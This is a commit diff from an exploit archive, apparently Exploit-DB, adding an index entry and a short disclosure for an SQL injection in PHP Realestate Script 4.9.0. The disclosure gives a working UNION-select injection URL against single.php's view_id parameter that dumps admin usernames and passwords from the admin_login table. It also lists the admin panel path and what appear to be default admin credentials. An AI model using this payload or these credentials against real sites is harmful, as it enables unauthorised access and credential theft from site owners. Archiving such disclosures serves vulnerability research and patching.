DB: 2016-05-28
1 new exploits PHP Realestate Script Script 4.9.0 - SQL Injection
This commit is contained in:
parent
2e7bce9702
commit
ab85a62fd6
2 changed files with 17 additions and 0 deletions
|
@ -36047,3 +36047,4 @@ id,file,description,date,author,platform,type,port
|
|||
39861,platforms/multiple/dos/39861.txt,"Graphite2 - TtfUtil::CheckCmapSubtable12 Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0
|
||||
39862,platforms/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0
|
||||
39863,platforms/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",multiple,dos,0
|
||||
39864,platforms/php/webapps/39864.txt,"PHP Realestate Script Script 4.9.0 - SQL Injection",2016-05-27,"Meisam Monsef",php,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
16
platforms/php/webapps/39864.txt
Executable file
16
platforms/php/webapps/39864.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
# Exploit Title: Property Agent RealeState Script Sql Injection
|
||||
# Date: 2015-05-27
|
||||
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
|
||||
# Vendor Homepage:
|
||||
http://www.phpscriptsmall.com/product/php-realestate-script/
|
||||
# Version: 4.9.0
|
||||
|
||||
Exploit :
|
||||
http://server/[path]/single.php?view_id=-99999+[SQl+Command]
|
||||
|
||||
Test :
|
||||
http://server/single.php?view_id=-57+/*!50000union*/+select+1,2,user_name,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin_login
|
||||
|
||||
Admin Panel : http://server/admin/
|
||||
Username : admin
|
||||
Password : inetsol
|
Loading…
Add table
Reference in a new issue